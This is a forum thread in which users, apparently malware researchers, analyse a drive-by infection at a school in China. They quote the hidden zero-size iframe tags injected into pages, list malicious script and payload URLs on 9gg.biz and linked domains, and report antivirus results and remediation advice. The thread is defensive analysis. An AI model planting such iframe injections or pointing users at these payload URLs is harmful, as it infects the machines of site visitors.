A new virus has hit the virus-riddled school I teach at in China. Like the '31joy.com/rb.vg' viruses back in September, it appears to change the IP address of infected machines to the gateway address, throwing the local network into chaos and infecting additional machines.

It inserts this malicious code at the top of pages:

<iframe src=hxxp://9gg.biz/ width=0 height=0 frameborder=0></iframe>

I haven't dug any deeper than that, but from the browser status bar I can see that bkoz.cn is also accessed.

Searching google for '9gg.biz', it looks like this is pretty new. No English-language posts about it any earlier than December.

RFC

If you visit the site in the iframe it tries to load 4 more iframes.

index.html - Tries to take advantage of an exploit in Real Player.

2.htm - Uses some .js files (I'll grab these as well) and tries to download 4.CAB (on the same domain) and from 4.cab run bd.exe

xl.htm - Does something.

stat.php - Appears to record stats on who is visiting the page.

I'll grab all the files I can and add the files to the malware listserv.

http://www.siteadvisor.com/sites/9gg.biz/

Is your AV able to remove it ok?

If you have XP try installing Windows Defender.

If you have Real Player installed update it to the latest version or uninstall it if you don't need it.

Do the PCs have all the updates from Windows Update?

Hi Tetak,

xl.htm - IEslice exploit + iframe:
<iFrAmE SRc=http://www.bkoz.cn/seo.htm width=0 height=0 frameborder=0></IfRaMe>

which leads onto

<iFrAmE SRc=http://www.cuyd.cn/seo.htm width=0 height=0 frameborder=0></IfRaMe>

Also tries to download

hxxp://9gg.biz/4.CAB


Have found the following malicious scripts, grab them and up to the listserv if you can:


htxp://9gg.biz/MPS.js
htxp://9gg.biz/PowerPlayerCtrl.js
htxp://9gg.biz/0614.js

Thanks MAPKOBKA.

The 2 xl.htm iframes seem to link to each other so I couldn't get anything from them.

I got 4.CAB, opening it crashed explorer but I was able to extract the 1 .exe file in it.

All the files I found, including the .js files have been processed.

Cool...

I had a near miss with the realplayer exploit, the blerdy thing tried to execute outside of my sandbox (driver error) ....luckily it asked before execution and I don't have any kind of realexploitplayer installed

I didn't think I had RealEasytoExploit player installed but when I was installing the latest version of the codec pack I use today I noticed it also installs the codecs for Real Player. Luckily it doesn't include QuickAndEasyToExploitTime so I was ok there.

Un-installing it right now...

Tetak, there also seems to be a /real.exe on that website, care to grab that one for the listserv too?


Cheers mate.

Real.exe - Result: 25/32 (78.13%)

I've manually sent it to Kaspersky as they don't currently detect it.

Hi,

Real.exe is Win32.Worm.Cekar

Regards,
Evilcry

Thanks for sending it. I hadn't realised it was so well detected.

Tetak asked, "Do the PCs have all the updates from Windows Update?"

I thought it was worth explaining the environment I teach in here, to give some idea of why this is such fertile ground for malware.

This is a large school with at least 1000PCs I'd guess. The organization I work for just rents space from a public Chinese school. However our internet connection routes through them, and we share network resources with them. So it's not possible to ensure that all machines on the local network are fully up to date. In fact, I'm sure that large numbers of them are not.

Now add to that the prevailing cultural attitude here - that it's only worth paying attention to viruses when they've made a machine so slow it's inoperable. And you can begin to see why here, we are 'early adopters' of new malware